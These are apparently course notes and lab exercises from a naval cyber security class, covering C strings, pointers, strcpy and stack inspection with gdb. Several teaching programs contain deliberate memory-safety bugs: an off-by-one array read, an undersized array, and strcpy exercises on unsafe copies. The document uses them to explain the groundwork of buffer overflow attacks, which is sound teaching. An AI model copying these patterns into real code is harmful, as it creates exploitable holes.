Now change the line
school[ 2 ] = 'v' ;
to read
school[ 2 ] = 0 ;
(Note that the line of code contains the number zero, not the letter oh.)
Question 3: What output is produced? Why is this output produced?
Now, change the line
school[ 2 ] = 0 ;
back to its original form:
school[ 2 ] = 'v' ;
but change the array declaration line
char school[ 10 ] ;
to read instead:
char school[ 2 ] ;
So, we are telling C that we intend that our character string only have two characters (and remember, one of them should be the NULL character).
Run the program.
Question 4: What was printed out? Did the program realize you only wanted the array to have two items? Explain.
If you feel very confident in your answer to Question 4, go on to Part 4. Otherwise, STOP and ask your instructor for help.
Part 4: Out of Bounds
Examine the program sx4b.c using nano. The C program is shown below:
#include <stdio.h>
#include <string.h>
int main()
{
int count[3] = { 1 , 2 , 3 };
int j;
for ( j = 1 ; j <= 3 ; j = j + 1 )
{
printf("The next number is %d\n" , count[j] );
}
}
Compile and run the program.
Question 5: What was printed out? Explain.
Question 6: How would you fix the program so that it prints out:
The next number is 1
The next number is 2
The next number is 3
Make this fix to your code and have your instructor verify that your program works properly.
After you have Question 6 signed off, proceed to Part 5.
UNIX Tips and Tricks
UNIX provides another feature to lessen the amount of typing that busy midshipmen have
to perform.
UNIX attempts to complete our commands for us, using a feature called tab completion.
To use tab completion, you type in part of a command, and then hit the tab key. UNIX will
attempt to complete the command for you (or may partially complete the command).
For example, suppose I have been editing the file smith_4_1.c, and have opened and closed this file several times
already. If I now type:
midshipman@EC310-VM:~ $ nano s
and then hit the Tab key, UNIX will automatically complete the command for me:
midshipman@EC310-VM:~ $ nano smith_4_1.c
Similarly, I find that if I type
midshipman@EC310-VM:~ $ ./a
and then hit the Tab key, UNIX will automatically complete the command for me:
midshipman@EC310-VM:~ $ ./a.out
Tab completion is very useful. Keep in mind that if UNIX cannot decide how to complete your
command (since you have not provided enough characters to start with), enter another character or two
and press Tab again.
Part 5: Joys of strcpy
Examine the program sx4c.c using nano. The C program is shown below:
#include <stdio.h>
#include <string.h>
int main()
{
char slogan[16] = "Cyber 2 is fun!" ;
printf("\n%s\n\n" , slogan );
}
Compile and run the program.
Question 7: Why did I choose to make the array size equal to 16? There are only 15 characters in the string Cyber 2 is fun!
Carefully add the following two lines to your program above, right before the closing brace.
strcpy( slogan , "Cyber rocks!" );
printf("\n%s\n\n" , slogan );
Compile and run the program.
Question 8:
What was printed out? Explain.
Your friend is confused. He looks at the length of the two strings:
C y b e r   2   i s   f u n !
C y b e r   r o c k s !
and wonders why the second item printed out wasn't Cyber rocks!un!. In other words, he wonders what happened to the
un! that finished the string Cyber 2 is fun!, since those last few characters were not overwritten.
Question 9:
What is the answer to your friend's question? Explain.
Security Exercise 4 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
__________________________
Instructor/Lab Tech signature
Question 7:
Question 8:
Question 9:
Chapter 5: Intro to Pointers
Objectives:
(a) Explain the operation of the address operator.
(b) Describe the relationships that exist between pointers, arrays and strings.
(c) Differentiate between the value of a pointer and the address of a pointer.
Let me give you some pointers for passing EC310: 0x0335a438, 0x0826d210, 0x0447ab36. Ha ha ha ha ... ha… er… ha?
1. Pointers
1.1. Why Use Pointers? Consider your favorite database: MIDS. Suppose you tell the registrar that you want to register for
the following courses:
HU222: Football Theory
HH333: History of Embarrassing Air Force Scandals
FP444: Cicero’s Impact on Renaissance Poetry as Developed for Theatre circa 1700
EC310: Cyber Security II
Now, other people also have to use (and possibly modify) your record in the MIDS database. Your advisor has to check that
you are on track for your major. Your instructors have to enter grades into your record. The Dean may have to annotate your
matrix with a note saying that one course counts for another course. Various people may have to enter conduct offenses.
So, let’s say that it comes time for your HU222 instructor to enter your six-week grade. How can this be accomplished? Recall
that the MIDS database, as with everything else a computer uses, resides in memory.
One option would be for the registrar to send your HU222 instructor a copy of the entire MIDS database, with a note: “Update
the database, and then send it back to me.”
This involves the duplication and movement of vast amounts of data. Can you think of a better way?
A better way would be to let the instructor modify the actual database… not a copy of the database. But how can that be done?
Suppose your instructor was given the address of the MIDS database in memory. Then, any changes made to the contents of
a memory location are actual changes to the MIDS database! In other words, instead of sending someone the MIDS database,
we simply tell them: "Here is the address of the MIDS database, go make your changes directly".
1.2. Addresses Recall from week one of the course that all variables have
- a type
- a name (also called an identifier)
- a value (possibly a garbage value)
- an address
We will focus on this notion of a variable’s address. Addresses are 4 bytes (32 bits) long. Since people don’t like reading 32-bit binary numbers…
Hey! I like reading 32-bit binary numbers!!!
CORRECTION…since most people don’t like reading 32-bit binary numbers, the shorthand hexadecimal notation is used.
As mentioned previously, memory locations are usually given in hexadecimal notation.
Practice Problem 5.1
If the first byte of a variable is stored at memory location numbered:
00000000000100101111111101111100
what is this address in hexadecimal notation?
Solution:
0000 0000 0001 0010 1111 1111 0111 1100
Practice Problem 5.2
For our x86 architecture, how many hexadecimal digits are in an address?
Solution:
1.3. The address operator &
& (the ampersand sign) is the address operator which is used to access the address of a
variable. &variable returns the address of variable. So, if we have a variable named y, then &y returns the address of y.
To examine how the ampersand operator behaves, consider the program below, along with its associated output.
Recall:
%d is used for integers
%x is used for hexadecimal
#include<stdio.h>
int main()
{
int current_year = 2014;
printf("\nThe year is %d and the address is %x \n" , current_year, &current_year);
}
1.4. Assigning Values to Pointers A pointer is a variable that holds a memory address, usually the address of another
variable. Put another way, a pointer is a data type that holds the hexadecimal address of another variable. Put a third way: A
pointer variable “points to” another variable. A pointer variable is itself stored in 4 bytes.
Declaring Pointers A pointer variable is declared by using the asterisk. For example, the declaration
data_type *pointer_name ;
means:
"I am declaring a pointer named pointer_name that will point to another variable of type data_type".
For example, consider the declaration
float *a_ptr ;
What does this mean? It means that we have told C that we would like to have a pointer variable named a_ptr that will be
used to point to some float variable (but it does not point anywhere yet!).
Assigning Values to Pointers. Recall that a pointer variable holds an address. To assign the correct address to a pointer
variable, we use the & operator (the address operator). Let's consider the code snippet below:
int a = 131;
int *a_ptr ;
a_ptr = &a;
Let's look at this code snippet line-by-line.
The very first line (int a = 131;) tells the compiler that you want to use a variable named a, of type integer, that will be
initialized to the value of 131. The compiler will place the value of a on the program's stack (recall that the stack is the
section of memory that a program has available to hold its variables and any other data it needs to perform its operation).
The operating system (not you, the programmer) will decide the precise address of where the variable a will be placed. Let's
presume that the compiler has chosen to store the variable a at address 0056DE73.
The second line of code (int *a_ptr;) tells the compiler that you want to use a pointer variable named a_ptr, that will
(at some time later in its life), point to variable of type int. This variable must also be stored on the stack. Let's presume that
the compiler has chosen to store the variable a_ptr at address 0056DA61.
Finally, the third line of code (a_ptr = &a;) places the address of a into the variable a_ptr.
Practice Problem 5.3
Consider the program shown below, along with its corresponding output.
#include<stdio.h>
int main()
{
int a = 4;
int *a_ptr;
a_ptr = &a;
printf("\nThe value of a is %d and the address is %x \n" , a , &a );
printf("\nThe value of a_ptr is %x and the address is %x \n\n", a_ptr , &a_ptr) ;
}
In the picture shown below:
(a) Fill in the two red circles.
(b) Draw an arrow showing where a_ptr is stored on the stack.
(c) Annotate the figure to show the value of a_ptr.
Pointers are confusing! Some argue that pointers are the greatest source of bugs in C programs. In fact, some modern
programming languages (such as Java) have eliminated pointers altogether since pointers are so confusing and lead to so many
errors.
But it is precisely because pointers are confusing that adversaries make use of them. Almost all program attacks involve the use or abuse of a pointer.
The Morris worm… Conficker… Stuxnet… these all employ a buffer overflow attack. The key to understanding this attack
involves understanding pointers.
1.5. Arrays and Pointers Recall our discussion of arrays from last lecture. We mentioned that if we declare an array with
float pay[4];
the compiler will reserve four consecutive memory locations, each of which will hold a float variable. The four variables are pay[0] , pay[1] , pay[2] and pay[3]. The array of all four variables is named pay.
Recall also that in the C programming language, strings—i.e., sequences of characters—are stored as arrays of characters. Here
is an example of declaring a string variable using a character array:
char school[20] = "US Naval Academy";
The array named school holds 17 characters:
school[0] = 'U'
school[1] = 'S'
school[2] = ' '
school[3] = 'N'
etc., etc.,
school[16] = 0
So… we can see what school[1] is (it’s a character… the character 'S' to be exact), but what exactly is the array name
school by its lonesome…without an index? Let's see!
#include<stdio.h>
int main()
{
char school[20] = "US Naval Academy" ;
printf("\nThe value of school is %x \n\n" , school ) ;
}
We have output an address…school was holding an address… school is a pointer. The bottom line is: An array name is
a pointer! When we declare an array, C generates a pointer, which is assigned the address of the first element of the array.
Consider the declaration
int a [4];
What really happens is:
int *a = &a[0]; [11]
(figure: a points here -> a[0], followed in memory by a[1], a[2], a[3])
For strings, we can tell C to print out a string by using the array name and the string format specifier. If we changed our
program to:
#include<stdio.h>
int main()
{
char school[20] = "US Naval Academy" ;
printf("\nThe value of school is %s \n\n" , school ) ;
}
(Only change! The old x is changed to an s.)
then the output would be:
Practice Problem 5.4
Recall that in RAM you have stored the machine language code for your program as well as additional memory allocated for
your variables within the program. This latter additional memory is called the stack.
You type into the debugger the command
i r ebp
and get the result 0xbffff818. The register ebp points to the "bottom" of the stack.
Upon further review of the assembly code you determine that two strings are stored in memory, one at address ebp-40 and
the other at ebp-24. (Note that the numbers 40 and 24 are ordinary base 10 numbers, not base-16.) What are the two hidden
words?
Solution:
(figure: ebp -> bffff818)
[11] It should be pointed out that this is not a line of valid C code. Our meaning is to convey: It’s as if this happened…
Practice Problem 5.5
A large program contains the following lines of code
int a = 11;
int b[2];
b[0] = 10;
b[1] = 6;
A section of this program's stack is shown below.
Address      Data
0xBFFFF8F0   0x3E
0xBFFFF8F1   0x3F
0xBFFFF8F2   0x4A
0xBFFFF8F3   0x0A
0xBFFFF8F4   0x00
0xBFFFF8F5   0x00
0xBFFFF8F6   0x00
0xBFFFF8F7   0x06
0xBFFFF8F8   0x00
0xBFFFF8F9   0x00
0xBFFFF8FA   0x00
0xBFFFF8FB   0x0B
0xBFFFF8FC   0x00
0xBFFFF8FD   0x00
0xBFFFF8FE   0x00
0xBFFFF8FF   0x4D
0xBFFFF900   0x08
0xBFFFF901   0x2C
0xBFFFF902   0x33
What would be the result of the statement:
printf("The address of array b is %x \n", b);
Solution:
Practice Problem 5.6
Recall that in RAM you have stored the object code for your program as well as additional memory allocated for your variables
within the program.
You type into the debugger the command: i r ebp and get the result 0xbffff810. Upon further review of the assembly
code you determine that two integers are stored in memory, one at address ebp-8 and the other at ebp+4. What are the hidden
decimal numbers?
An Aside
Why does scanf sometimes require an ampersand in front of the variable's name and sometimes not?
Recall that scanf is another name for the keyboard. When the writers of the C programming
language designed the scanf statement, the intent was that the item into which the keyboard
input is placed would be provided as an address.
What does that mean? That means that when we have a scanf statement, such as
scanf("%f" , &year_number );
the place where we deposit the keyboard input, shown as a red box in the statement above, must be an address. That is
simply the way the C language was written.
So if we declare a variable of, say, type float as in
float EC310_torture_factor ;
and we want to read in the value of the EC310_torture_factor from the keyboard, we cannot do this:
scanf("%f" , EC310_torture_factor );          Error! Bad!
The reason we cannot do this is because EC310_torture_factor is not an address, and the scanf statement always expects that you will provide it an address into which to deposit the keyboard input.
So, we can place the value read in from the keyboard into the variable EC310_torture_factor by providing the address of EC310_torture_factor using the address operator:
scanf("%f" , &EC310_torture_factor );         Correct! Good!
Knowing how the scanf statement was designed should provide insight into how strings are entered from the keyboard.
Last lecture we mentioned that when entering strings from the keyboard, you don’t use the ampersand: &. For example,
to enter a midshipman's last name from the keyboard, we would use:
char mid_name[24] ;
scanf( "%s " , mid_name );
Note: No ampersand in front of mid_name !
The reason: Recall from Section 1.5 above that an array name is a pointer—when we declare an array, C
generates a pointer, which is assigned the address of the first element of the array. So, in this
particular case, mid_name is an address already, so we do not add the ampersand!
OPTIONAL: For your reading and viewing pleasure, here is an example of a “buffer overflow attack”. We will discuss the
buffer overflow in greater detail, but for now, let's just watch a Pre-Snowden video:
http://www.cbsnews.com/video/watch/?id=7400904n (first 6-7 minutes)
Problems
1.
Examine the program char_array.c which already exists in the booksrc directory.
(a) How does a program know it has reached the end of a string?
(b) How many more characters could legitimately fit into this particular string?
2.
Given the string declaration below, mark each strcpy() function call as Safe (S) if the string literal can be safely stored in the array, or Unsafe (U) if the string literal cannot be stored safely in the array. The array is declared as:
char President[8];
(a) strcpy( President , "Monroe\n");
(b) strcpy( President , "Polk\t");
(c) strcpy( President , "Cleveland\n");
(d) strcpy( President , "Garfield");
3.
Given the following variable declarations:
int foo;
char *bar;
and the following memory layout (all values in hexadecimal and little endian; each row shows the four bytes starting at the address on its left, lowest address first):
080483A0:  42 52 41 56
080483A4:  4F 21 00 00
080483A8:  A0 83 04 08    <- bar
080483AC:  05 DB 66 72    <- foo
What is the value of:
(a) &foo (in hex)
(b) foo (in decimal)
(c) bar (in hex)
(d) &bar (in hex)
(e) If we were to print out the string named bar what would be printed out?
4.
Given the following declarations, what would be the C statement to assign ptr_age the address of the integer age?
(Circle the correct answer)
int age;
int *ptr_age;
(a) &ptr_age = &age;
(b) *ptr_age = &age;
(c) &ptr_age = *age;
(d) ptr_age = age;
(e) ptr_age = &age;
5.
Given the following C snippet, what would the output of the printf statement be?
char name[40] = "LCDR Atwood";
char *ptr1;
char *ptr2;
ptr1 = name;
ptr2 = ptr1 + 6;
strcpy(ptr2, "good day by all!");
printf("My teacher is %s\n", name);
Security Exercise 5
Part 1: Initial Setup
Your instructors have prewritten two C programs that you will use for
this lab, and have placed them in the ec310code directory. The
two programs you will use today are named sx5a.c and sx5b.c .
Copy these two files from the ec310code directory to the work directory
by carefully entering the following two lines at the home directory prompt:
midshipman@EC310:~ $ cp ec310code/sx5a.c work
midshipman@EC310:~ $ cp ec310code/sx5b.c work
(Make sure you are at your home directory! Enter this!)
If all went well, you should have copies of sx5a.c and sx5b.c in your
work directory. Verify that you have sx5a.c and sx5b.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory: ls
If you do not have sx5a.c and sx5b.c in your work directory STOP and ask your instructor or lab tech for help.
Otherwise, proceed to Part 2.
Part 2: Go Navy
You should now be in the work directory:
Examine the program sx5a.c using nano. The C program is shown below:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
printf( "%s\n" , phrase );
}
Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using
gcc -g sx5a.c
and then run your program: ./a.out . If your program is not working as expected STOP and ask your instructor for help.
Otherwise, proceed to Part 3.
Part 3: Memory
The array named phrase is a string, and the contents of this string are stored in main memory on the program's stack. We
would like to determine the starting address of the string. By using nano, change only a single character in statement
printf( "%s\n" , phrase );
to determine the main memory address of where the string named phrase begins. Compile and execute your program.
Question 1: What was the single character you changed?
Question 2: How many bytes of memory are required to hold a single character?
Question 3: Looking at your source code, what character should be stored at phrase[ 1 ] ?
Question 4: Looking at your source code, what character should be stored at phrase[ 8 ] ?
Question 5. Complete the printf statement that would allow you to see the address of the character stored at
phrase[1] (don't actually make the change using nano, just state what you would do):
printf( "The address of phrase[1] is %x " , ______________ ) ;
Question 6: Sketch how your array should be stored in memory in the picture shown on your answer sheet. Each box
represents a byte in memory. Assume that the array named phrase points to the location shown, and that memory
locations are increasing going down the page. For this question all you need to do is fill in the ASCII characters that
are stored in each memory location.
If, in answering Question 1 above, you made a modification to your program, restore the program to its original form as
shown on the prior page.
Carefully modify your C program (using nano) so that it contains the three new lines shown in bold italics:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
char *ptr;                       <-- Add these two lines. (You can also add blank lines around these two new lines if you wish.)
ptr = phrase;
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );          <-- Add this line. (Also add blank lines if you wish.)
}
Compile and execute your program, examining the output. If your program is not compiling STOP and ask your instructor for
help. Otherwise, proceed to Part 4.
Part 4: Go Navy Navy
Recall that phrase, the name of an array, is really a pointer to an array of characters. In fact, phrase holds the address of
the first element of the array. And the variable ptr is also a pointer.
Question 7: The line of code
ptr = phrase;
is an assignment statement. What is being assigned to what?
Question 8: Explain your program's output.
Carefully modify your C program so that it contains the three new lines shown in bold italics:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
char *ptr;
ptr = phrase;
char *another_ptr;               <-- Add this line.
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );
another_ptr = ptr + 3 ;          <-- Add these two lines.
printf( "%s\n" , another_ptr );
}
Compile and execute your program. If your program is not compiling STOP and ask your instructor for help. Otherwise,
proceed to Part 5.
Part 5: Army Strikes Back
Question 9: Explain your program's output.
Question 10: In the same sketch as Question 6, fill in:


the location where ptr points to.
the location where another_ptr points to.
Carefully modify your C program to add the two new lines shown in bold italics (do not worry about the presence or absence
of blank lines in your code):
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
char *ptr;
ptr = phrase;
char *another_ptr;
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );
another_ptr = ptr + 3 ;
printf( "%s\n" , another_ptr );
strcpy( another_ptr , "Army!" );   <-- Add these two lines.
printf( "%s\n" , ptr );
}
Recall that the strcpy command provides a means for changing the values of the characters stored in a string.
Ensure that you use strcpy to change another_ptr , not ptr (see the code above).
Note that we then, in the last line of code, use ptr in the printf command.
Compile and execute your program, examining the output.
Question 11: Explain the last line of output produced by the program. Specifically, why did the value of the string
named ptr change (as reflected by the last line of output) when all you did using the strcpy command was change
a different string (the string named another_ptr). Phrasing this question another way: Your program above never
directly changes ptr after the line
ptr = phrase;
but—somehow—the value printed out by the last line reflects a change. What caused this?
If you are baffled, STOP and ask your instructor for an explanation. Otherwise, proceed to Part 6.
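As an added example (not one of the sx5 programs and not from the notes), the following program replays the Go Navy / Army! sequence of Parts 4 and 5 and the "an array name is a pointer" point from Chapter 5 Section 1.5, with the addresses and bytes made visible; the helper names examine_bytes, go_navy_to_army and array_name_is_first_element are my own.

```c
#include <stdio.h>
#include <string.h>

/* Mimic gdb's x/Nxb: print n bytes starting at p, in hex, on one line. */
void examine_bytes(const char *label, const char *p, size_t n) {
    printf("%-14s %p:", label, (const void *)p);
    for (size_t i = 0; i < n; i++)
        printf(" 0x%02x", (unsigned char)p[i]);
    printf("\n");
}

/* Perform the lab's sequence. phrase, ptr and another_ptr are three names
 * for addresses inside ONE array, so the strcpy through another_ptr changes
 * the bytes that ptr (and phrase) print, even though ptr itself is never
 * reassigned. out_before / out_after receive what ptr printed before and
 * after the strcpy; the return value is another_ptr - phrase, i.e. the "+ 3". */
long go_navy_to_army(char out_before[10], char out_after[10]) {
    char phrase[10] = "Go Navy!";   /* 8 characters + NUL, phrase[9] is also 0 */
    char *ptr = phrase;             /* same address as &phrase[0] */
    char *another_ptr = ptr + 3;    /* points at phrase[3], the 'N' */

    strcpy(out_before, ptr);        /* "Go Navy!" */
    strcpy(another_ptr, "Army!");   /* writes A r m y ! NUL into phrase[3..8] */
    strcpy(out_after, ptr);         /* "Go Army!": ptr did not change, the bytes did */

    return (long)(another_ptr - phrase);   /* pointer difference counts elements: 3 */
}

/* The array name used by itself is the address of the first element. */
int array_name_is_first_element(void) {
    char phrase[10] = "Go Navy!";
    return phrase == &phrase[0];    /* 1 (true) */
}

int main(void) {
    char before[10], after[10];
    long off = go_navy_to_army(before, after);
    printf("ptr before strcpy: %s\n", before);
    printf("ptr after  strcpy: %s\n", after);
    printf("another_ptr = phrase + %ld\n", off);
    printf("phrase == &phrase[0]: %d\n", array_name_is_first_element());

    /* Now the same thing byte by byte, the way the debugger shows it. */
    char phrase[10] = "Go Navy!";
    char *ptr = phrase;
    char *another_ptr = ptr + 3;
    examine_bytes("phrase", phrase, 10);         /* 47 6f 20 4e 61 76 79 21 00 00 */
    examine_bytes("another_ptr", another_ptr, 6); /* 4e 61 76 79 21 00 */
    strcpy(another_ptr, "Army!");
    examine_bytes("after strcpy", phrase, 10);   /* 47 6f 20 41 72 6d 79 21 00 00 */
    printf("%s\n", ptr);
    return 0;
}
```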
Part 6: Autopsy of the Program
Recall that when we execute a program, it is moved from secondary memory (e.g., the hard disk) to main memory (RAM).
The particular program's machine language code is moved into main memory, and the program is also given additional space
in main memory (called the stack) that it can use to store variable values that it needs to execute.
In the figure shown below, the machine language code has been moved into main memory starting at address 0x08048374
and the program's stack is between memory locations 0xbfffff71 and 0xbfffff73.
Note that our program is not "stored in the CPU." Rather, the program is stored in main memory.
The CPU can interact with the program via the three registers that we have learned about:
- The eip register holds the address of the next instruction that will be executed (but has not yet been executed).
- The esp register points to the "top" of the stack.
- The ebp register points to the bottom of the stack.
Note in the figure above the values of the eip, esp and ebp registers.
Now, the gdb debugger can be thought of as a microscope that allows us to examine in detail the CPU registers and memory.
We have seen that we can use the info command to examine registers. For example, in the context of the figure above, if I
entered
i r eip
I should obtain the value of 0x08048374.
Similarly, if I entered
x/xb 0x08048374
I should see the value 0x55.
We will examine a program using the debugger, and show in particular how we can use the names of pointer variables in
debugger commands. And at the end of this Security Exercise (no peeking!) we will show you a useful enhancement to the
examine command.
Enough of program sx5a.c . I'm sure you are sick of that program! Let's move on to sx5b.c !!! Using nano examine
the program sx5b.c . The C program is shown below:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
char *ptr;
ptr = phrase;
char *another_ptr;
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );
another_ptr = ptr + 3 ;
printf( "%s\n" , another_ptr );
strcpy( another_ptr , "Army!" );
printf( "%s\n" , ptr );
}
Note that this is the same program that you left off with, but we have cleaned it up (e.g., to remove unnecessary blank lines).
DO NOT MAKE ANY CHANGES TO THIS PROGRAM!
Let’s use the debugger to examine the program on prior page a bit more closely. Type the following at the prompt. Do not
type the comments!
gcc -g sx5b.c        // The -g provides extra functionality for the debugger.
gdb -q ./a.out       // Recall that gdb is the name of the debugger.
set dis intel        // This displays the assembly code in standard Intel lingo
list                 // This repeats the source code for convenience
<Enter>              // Just hit the Enter key. This displays the remainder of your source code
break 13             // This sets a "breakpoint" at line 13. This is the next to last line of your
                     // program - the line that uses strcpy.
run                  // This starts executing the program up to the breakpoint.
After entering all of these commands, your program will have executed up to but not including line 13. Line 13 is the next to
last line of your program – the line that uses strcpy.
Let's find out the address that phrase holds (remember, the name of an array such as phrase holds the address of the first
element in the array). We would also like to know actual contents of this address.
Let’s do this by typing
x/xb phrase
You should see:
(gdb) x/xb phrase
0xbffff800:    0x47
(Note: You may see a number slightly different from 0xbffff800, but you should see the value of 0x47. If you do not see
the value of 0x47 then STOP and ask your instructor for help.)
Let's explain the command you just entered. Recall that the first x invokes the examine command, the second x specifies
hexadecimal, and the b asks the debugger to display a single-byte quantity. When the examine command is used with array
names or pointer variables (such as phrase, ptr and another_ptr), the first item returned will be the contents of the
pointer and the second item returned will be the value that the pointer is pointing to.
(gdb) x/xb phrase
0xbffff800:    0x47
(The first item, 0xbffff800, is the address stored in phrase. The second item, 0x47, is the memory contents of this specific address.)
Question 12. Fill in the picture shown on the answer sheet, showing the contents of phrase, and the hexadecimal
value stored in the memory location pointed to by phrase. (Note that this figure will be gradually filled in as we
complete this lab; for this question, you are only being asked to show the contents of phrase, and the value stored
in the memory location pointed to by phrase.)
Question 13. What on earth does that 0x47 represent?
Question 14. Determine what is stored at the memory location that phrase contains by examining the memory
directly using the command:
x/xb 0xbffff800
Question 15. On the same figure as Question 12, fill in the contents of ptr and another_ptr. These are both
pointers so your answers should be addresses.
Question 16. On the same figure as Question 12, draw arrows showing where phrase, ptr and another_ptr
all point to; i.e., draw an arrow from the pointer to the memory location with the corresponding address.
Question 17. On the same figure as Question 12, show the hexadecimal values stored in the memory locations pointed
to by these three pointers phrase, ptr and another_ptr.
Question 18. The pointer named another_ptr seems to be pointing to the value 0x4e. What is that?
Question 19. On the same figure as Question 12, fill in the addresses of each byte of main memory depicted on the
figure (placing the address to the left of the byte), and fill in the contents of each memory location as ASCII characters.
You should do this by using the debugger to examine memory one byte at a time. For example, if I wanted to examine
the memory location 0xbffff801 I would enter
x/xb 0xbffff801
When you have completed your picture, STOP and show it to your instructor. If correct, you can proceed to Part 7.
Part 7: Further Autopsy of the Program
Recall that our program has executed up to but not including line 13. Line 13 is the next to last line of your program – the line
that uses strcpy.
Now, execute the program (using nexti ) until you show line 14 as the next instruction to execute. In other words, keep
entering nexti until you see:
14      printf( "%s\n" , ptr );
It should be the case that you have to enter nexti four times to see the line shown above.
Question 20. Fill in the picture shown on the answer sheet in its entirety, showing the memory address of all bytes,
the contents of all bytes (as ASCII characters) and the contents of the pointers.
Now, the C line of code:
printf( "%s\n" , ptr );
goes to the memory address pointed to by ptr, and starts printing out characters in memory, one after another, until a NULL
is reached.
Question 21. What will be printed out by the next statement (printf( ptr ); )?
Question 22. Your friend is confused. He says: “We never made any changes involving ptr – we only made changes
to another_ptr (using the strcpy command).” So, why did we get different results when we executed the line
printf( ptr ); ? How do you reply?
We can type out multiple bytes with a single x/xb command by specifying the number of bytes to display. For example, we
can print out a single byte starting at the address pointed to by phrase by typing
x/xb phrase
But, if we want to see, say, 8 bytes of data starting at the address pointed to by phrase, we can type
x/8xb phrase
Question 23. Explain the meaning of the results that you see when you enter x/8xb phrase.
Question 24. Explain the meaning of the results that you see when you enter x/8c phrase.
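The aliasing in Questions 21 and 22 and the byte dumps of Questions 23 and 24 can be reproduced outside the debugger. The program below is an added example, not the sx5.c program from the exercise: the buffer contents ("Go Navy"), the position of another_ptr (at the 'N', byte 0x4e) and the string copied are constructed here, and the helper names format_xb, format_c and alias_demo are made up. It prints what printf("%s\n", ptr) shows before and after the strcpy through another_ptr, and formats the first 8 bytes of the buffer the way gdb's x/8xb and x/8c do.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Render n bytes starting at p the way gdb's x/nxb does: "0x47 0x6f 0x20 ..." */
static void format_xb(const void *p, size_t n, char *out, size_t outsz)
{
    const unsigned char *b = (const unsigned char *)p;
    size_t used = 0;
    out[0] = '\0';
    for (size_t i = 0; i < n && used < outsz; i++) {
        int w = snprintf(out + used, outsz - used, "%s0x%02x", i ? " " : "", b[i]);
        if (w < 0) break;
        used += (size_t)w;
    }
}

/* Render n bytes the way gdb's x/nc does: decimal value plus the character,
 * e.g. "71 'G' 111 'o' ... 0 '\000'"; non-printable bytes use an octal escape. */
static void format_c(const void *p, size_t n, char *out, size_t outsz)
{
    const unsigned char *b = (const unsigned char *)p;
    size_t used = 0;
    out[0] = '\0';
    for (size_t i = 0; i < n && used < outsz; i++) {
        int w;
        if (isprint(b[i]))
            w = snprintf(out + used, outsz - used, "%s%d '%c'", i ? " " : "", b[i], b[i]);
        else
            w = snprintf(out + used, outsz - used, "%s%d '\\%03o'", i ? " " : "", b[i], b[i]);
        if (w < 0) break;
        used += (size_t)w;
    }
}

struct alias_result {
    char before[16];   /* what printf("%s\n", ptr) prints before the strcpy */
    char after[16];    /* ... and after it                                  */
    char xb[64];       /* x/8xb phrase, after the strcpy                     */
    char xc[128];      /* x/8c  phrase, after the strcpy                     */
};

/* Run the demo and return a pointer to its (static) results. */
static const struct alias_result *alias_demo(void)
{
    static struct alias_result r;
    char phrase[16];

    strcpy(phrase, "Go Navy");        /* constructed contents: 47 6f 20 4e 61 76 79 00 */
    char *ptr = phrase;               /* plays the role of ptr: start of the buffer    */
    char *another_ptr = phrase + 3;   /* plays the role of another_ptr: at 'N' (0x4e)  */

    strcpy(r.before, ptr);
    /* "Army" plus its NUL is 5 bytes; phrase+3 .. phrase+7 lie inside the 8-byte
     * string, so this copy overwrites "Navy" in place and does not overflow.
     * strcpy itself performs no such check: a longer string would run off the
     * end of phrase, which is the subject of Chapter 7. */
    strcpy(another_ptr, "Army");
    strcpy(r.after, ptr);             /* ptr was never reassigned, yet it now prints "Go Army" */

    format_xb(phrase, 8, r.xb, sizeof r.xb);
    format_c(phrase, 8, r.xc, sizeof r.xc);
    return &r;
}

int main(void)
{
    const struct alias_result *r = alias_demo();
    printf("printf(\"%%s\\n\", ptr) before strcpy : %s\n", r->before);
    printf("printf(\"%%s\\n\", ptr) after  strcpy : %s\n", r->after);
    printf("x/8xb phrase : %s\n", r->xb);
    printf("x/8c  phrase : %s\n", r->xc);
    return 0;
}
```

Compile with gcc -g and run it. The point for Question 22 is that ptr and another_ptr are two addresses into the same bytes: changing the bytes through one pointer changes what the other prints, even though ptr itself was never assigned again. The x/8xb line shows the 8 bytes as hexadecimal values, and the x/8c line shows the same bytes as ASCII characters with their decimal codes, ending in the 0 byte that terminates the string.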
Security Exercise 5 Answer Sheet
Name: _____________________
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6 and Question 10:
Question 7:
Question 8:
Question 9:
Question 11:
Question 12, Question 15, Question 16, Question 17, Question 19
Question 13:
Question 14:
Question 18:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24:
Chapter 6: Functions and the Stack
Objectives:
(a) Demonstrate the ability to analyze simple programs using functions.
(b) Describe the organization and contents of a program’s stack throughout the program’s execution.
(c) Demonstrate the ability to examine the stack values of a running program.
1. Functions
1.1. Introduction It is often best to solve a large problem by successively decomposing it into smaller and smaller
subproblems until the subproblems are easy enough to directly implement in C.
C facilitates this process by providing a mechanism for building up a large program from small subprograms called functions.
A large complicated program can be constructed by combining a number of smaller programs (functions), each of which
performs specific simple tasks.
To use a function we must invoke it with a function call. The function call specifies:
• the function name
• the arguments, i.e., the inputs, provided to the function
The syntax for a function call is:
function_name ( argument_1, argument_2, ..., argument_n)
Again, the arguments are the inputs to the function. Functions might (and often do) have only one argument. In fact, some
functions have no arguments! If a function has arguments, the arguments can be numbers, variables or more complicated
expressions.
The value a function computes is called the return value. The return value can be thought of as the output of a function.
A function has at most one return value. Many functions have no return value.
This probably all sounds a bit vague, so let's look at a concrete example. Suppose there was a function named sqrt, used to
determine the square root of a number. In the statement
y = sqrt( x ) ;
the variable x is the function’s argument (input) and sqrt( x ) is the function call. The value computed by the function
is the function’s output, or return value. For example, if x has the value 9.0, then the function’s return value is 3.0, and this
value is placed into the variable y.
